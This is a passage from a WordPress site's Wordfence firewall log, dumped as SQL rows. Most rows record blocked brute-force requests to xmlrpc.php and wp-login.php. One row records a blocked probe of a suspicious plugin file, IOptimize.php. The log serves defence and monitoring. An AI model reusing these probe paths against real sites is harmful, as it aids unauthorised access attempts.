Network',NULL),(9626,0.000000,1630345660.963092,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9627,0.000000,1630345853.672867,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9628,0.000000,1630345893.382053,'\0\0\0\0\0\0\0\0\0\0��R�,�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9629,0.000000,1630346047.616513,'\0\0\0\0\0\0\0\0\0\0��g��8',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9630,0.000000,1630346260.001558,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9631,0.000000,1630346462.095746,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9632,0.000000,1630346672.019608,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9633,0.000000,1630346882.538398,'\0\0\0\0\0\0\0\0\0\0��PQ\0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9634,0.000000,1630347089.835547,'\0\0\0\0\0\0\0\0\0\0���O�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9635,0.000000,1630347299.274799,'\0\0\0\0\0\0\0\0\0\0���Dm',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9636,0.000000,1630347437.381469,'\0\0\0\0\0\0\0\0\0\0����n�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9637,0.000000,1630347504.907869,'\0\0\0\0\0\0\0\0\0\0���G?/',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9638,0.000000,1630347717.182036,'\0\0\0\0\0\0\0\0\0\0����{�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9639,0.000000,1630347926.433217,'\0\0\0\0\0\0\0\0\0\0��_��&',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9640,0.000000,1630348132.052829,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9641,0.000000,1630348342.722029,'\0\0\0\0\0\0\0\0\0\0��4���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9642,0.000000,1630348546.952750,'\0\0\0\0\0\0\0\0\0\0����N',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9643,0.000000,1630348988.993786,'\0\0\0\0\0\0\0\0\0\0��6�%�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9644,0.000000,1630348988.994396,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9645,0.000000,1630349197.239637,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9646,0.000000,1630349414.445808,'\0\0\0\0\0\0\0\0\0\0���&V',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9647,0.000000,1630349624.767311,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9648,0.000000,1630349829.377927,'\0\0\0\0\0\0\0\0\0\0��ӕ��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9649,0.000000,1630350056.883209,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9650,0.000000,1630350282.031643,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9651,0.000000,1630350473.111381,'\0\0\0\0\0\0\0\0\0\0���5�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9652,0.000000,1630350726.020523,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9653,0.000000,1630350947.298438,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9654,0.000000,1630351172.174847,'\0\0\0\0\0\0\0\0\0\0����T`',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9655,0.000000,1630351407.184938,'\0\0\0\0\0\0\0\0\0\0���H�l',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9656,0.000000,1630351631.467107,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9657,0.000000,1630351856.186254,'\0\0\0\0\0\0\0\0\0\0��\r$n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9658,0.000000,1630352086.294187,'\0\0\0\0\0\0\0\0\0\0��h�P�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9659,0.000000,1630352149.513398,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(9660,0.000000,1630352333.651766,'\0\0\0\0\0\0\0\0\0\0��k�i�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9661,0.000000,1630352810.692845,'\0\0\0\0\0\0\0\0\0\0��Kw�d',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9662,0.000000,1630353253.298636,'\0\0\0\0\0\0\0\0\0\0��-7<n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9663,0.000000,1630353757.567500,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9664,0.000000,1630354003.586628,'\0\0\0\0\0\0\0\0\0\0���U��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9665,0.000000,1630354227.343003,'\0\0\0\0\0\0\0\0\0\0��n��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9666,0.000000,1630354441.439388,'\0\0\0\0\0\0\0\0\0\0��h�-�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9667,0.000000,1630354959.259106,'\0\0\0\0\0\0\0\0\0\0����!�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9668,0.000000,1630355204.190272,'\0\0\0\0\0\0\0\0\0\0��P��o',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9669,0.000000,1630355306.483931,'\0\0\0\0\0\0\0\0\0\0��3',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9670,0.000000,1630355443.308329,'\0\0\0\0\0\0\0\0\0\0��B�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9671,0.000000,1630355681.164029,'\0\0\0\0\0\0\0\0\0\0���ࣶ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9672,0.000000,1630355926.691166,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9673,0.000000,1630356173.094537,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9674,0.000000,1630356392.173671,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9675,0.000000,1630356646.262404,'\0\0\0\0\0\0\0\0\0\0��ec',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9676,0.000000,1630356919.383739,'\0\0\0\0\0\0\0\0\0\0��DB�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9677,0.000000,1630357164.101050,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9678,0.000000,1630357425.599021,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9679,0.000000,1630357688.903318,'\0\0\0\0\0\0\0\0\0\0����!�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9680,0.000000,1630357908.416763,'\0\0\0\0\0\0\0\0\0\0��D�\n9',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9681,0.000000,1630358442.215281,'\0\0\0\0\0\0\0\0\0\0�����q',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9682,0.000000,1630358448.992252,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9683,0.000000,1630358721.274766,'\0\0\0\0\0\0\0\0\0\0���H�l',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9684,0.000000,1630358969.960402,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9685,0.000000,1630359227.223858,'\0\0\0\0\0\0\0\0\0\0��C�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9686,1630359412.095100,1630359412.004400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(9687,0.000000,1630359462.143180,'\0\0\0\0\0\0\0\0\0\0���Aێ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9688,0.000000,1630359724.300890,'\0\0\0\0\0\0\0\0\0\0���@v�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9689,0.000000,1630360008.731344,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9690,0.000000,1630360011.065395,'\0\0\0\0\0\0\0\0\0\0���>}�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9691,0.000000,1630360273.797373,'\0\0\0\0\0\0\0\0\0\0���?�:',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9692,0.000000,1630360537.679015,'\0\0\0\0\0\0\0\0\0\0��gx�V',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9693,0.000000,1630360802.961034,'\0\0\0\0\0\0\0\0\0\0��o]8�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9694,0.000000,1630361063.285059,'\0\0\0\0\0\0\0\0\0\0��Uy\\',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9695,0.000000,1630361310.453523,'\0\0\0\0\0\0\0\0\0\0����s',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9696,0.000000,1630361578.241333,'\0\0\0\0\0\0\0\0\0\0���@tA',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9697,0.000000,1630361587.834121,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9698,0.000000,1630361882.951352,'\0\0\0\0\0\0\0\0\0\0��hƬD',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9699,0.000000,1630362156.382583,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9700,0.000000,1630362399.860704,'\0\0\0\0\0\0\0\0\0\0���@r',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9701,0.000000,1630362677.236399,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9702,0.000000,1630362989.026250,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9703,0.000000,1630363245.893354,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9704,0.000000,1630363521.937777,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9705,0.000000,1630363804.640904,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9706,0.000000,1630364083.325960,'\0\0\0\0\0\0\0\0\0\0���Y �',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9707,0.000000,1630364336.081266,'\0\0\0\0\0\0\0\0\0\0��#�D',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9708,0.000000,1630364653.721184,'\0\0\0\0\0\0\0\0\0\0��[�(n',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9709,0.000000,1630364756.476856,'\0\0\0\0\0\0\0\0\0\0�����q',0,200,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(9710,0.000000,1630364932.038275,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9711,0.000000,1630365194.020090,'\0\0\0\0\0\0\0\0\0\0���@w�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9712,0.000000,1630365521.912950,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9713,0.000000,1630365816.463240,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9714,0.000000,1630366069.356913,'\0\0\0\0\0\0\0\0\0\0���@v�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9715,0.000000,1630366380.111795,'\0\0\0\0\0\0\0\0\0\0��ge+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 